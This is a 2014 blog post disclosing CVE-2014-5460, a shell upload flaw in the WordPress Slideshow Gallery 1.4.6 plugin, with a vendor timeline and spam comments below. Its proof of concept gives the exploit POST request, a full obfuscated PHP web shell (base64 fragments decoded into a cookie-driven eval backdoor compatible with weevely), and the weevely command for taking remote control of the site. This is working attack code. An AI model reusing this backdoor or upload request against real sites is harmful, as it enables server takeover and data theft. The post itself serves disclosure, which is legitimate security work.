viernes, 29 de agosto de 2014

WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460)

WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.

Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default).

I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system. 

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Slideshow Gallery 1.4.7
FIX: Possible shell exploit by uploading PHP file as slide

Proof of Concept (PoC):

1.An attacker uploads a PHP shell file (i.e. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1
Content-Type: multipart/form-data
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce");
$dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz";
$asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiRrLic+Jzt9";
$gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSzh";
$fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpezhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>

2.The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3.The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

4.Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the vulnerable website.

Vulnerability Disclosure Timeline:

2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure

Found by: Jesús Ramírez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/

Date: 2014-08-28

Vulnerability Advisory and Proof of Concept (PDF).
Video demostración del ataque CVE-2014-5460.

10 comentarios:

  1. Thanks for sharing this . Currently looking at the best technique for a members site so very useful for me. Just Visit

    ResponderEliminar
  2. It’s great article as usual. You always write brief and informative articles. That’s why I,m your fan. Thanks! I'm from awaz

    ResponderEliminar
  3. Agilestorelocator is a premium WordPress plugin that is using Google Maps API V3 to render Stores List with markers to find location on Google Map. Get Plugin is for WordPress easily. Here are options for the Store Locator WordPress, Location finder WordPress, plugin is for WordPress.

    ResponderEliminar
  4. Hi,

    Thanks for sharing a very interesting article about WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460). This is very useful information for online blog review readers. Keep it up such a nice posting like this.

    Regards,
    WondersMind,
    Web Design Company Bangalore

    ResponderEliminar
  5. hey i loved your site layout and especially the way you wrote everything. I must say that you keep posting this type of information so that we may see the latest news.
    Seo Expert In Pakistan

    ResponderEliminar
  6. Well, don't forget to take part in Kroger feedback survey. Krogerfeedback survey is conducted at the ooficial kroger feedback website which is krogerfeedback.com
    www.krogerfeedback.com 50 fuel points

    ResponderEliminar